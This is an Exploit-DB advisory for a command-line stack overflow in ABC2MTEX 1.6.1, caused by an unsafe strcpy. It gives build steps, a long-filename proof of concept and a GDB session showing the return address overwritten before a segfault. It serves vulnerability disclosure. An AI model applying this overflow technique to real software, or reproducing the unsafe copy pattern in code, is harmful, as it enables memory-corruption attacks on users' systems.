ABC2MTEX 1.6.1 - Command Line Stack Overflow

EDB-ID:

47254

CVE:

N/A




Platform:

Linux

Date:

2019-08-14


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
Date: 2019-08-13
Exploit Author: Carter Yagemann <yagemann@gatech.edu>
Vendor Homepage: https://abcnotation.com/abc2mtex/
Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
Version: 1.6.1
Tested on: Debian Buster

An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
address from the openIn function by providing a long input filename. This
carries similar risk to CVE-2004-1257.

Setup:

$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
$ tar -xzf abc2mtex1.6.1.tar.gz
$ make

$ gcc --version
gcc (Debian 8.3.0-6) 8.3.0
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

PoC:

$ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA

GDB:

We're going to place a breakpoint before and after abc.c:241 to show the overflow.

$ gdb -q ./abc2mtex
Reading symbols from ./abc2mtex...done.
(gdb) break abc.c:241
Breakpoint 1 at 0x4139: file abc.c, line 241.
(gdb) break abc.c:242
Breakpoint 2 at 0x414c: file abc.c, line 242.
(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA

Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
241                     (void) strcpy(savename,filename);
(gdb) bt
#0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
#1  0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273
(gdb) c
Continuing.

Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
242                     (void) strcat(filename,".abc");
(gdb) bt
#0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
#1  0x0000414243444546 in ?? ()
#2  0x00007fffffffe4f8 in ?? ()
#3  0x0000000200000000 in ?? ()
#4  0x0000000000000000 in ?? ()
(gdb) c
Continuing.
file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist

Program received signal SIGSEGV, Segmentation fault.
0x0000414243444546 in ?? ()
(gdb) quit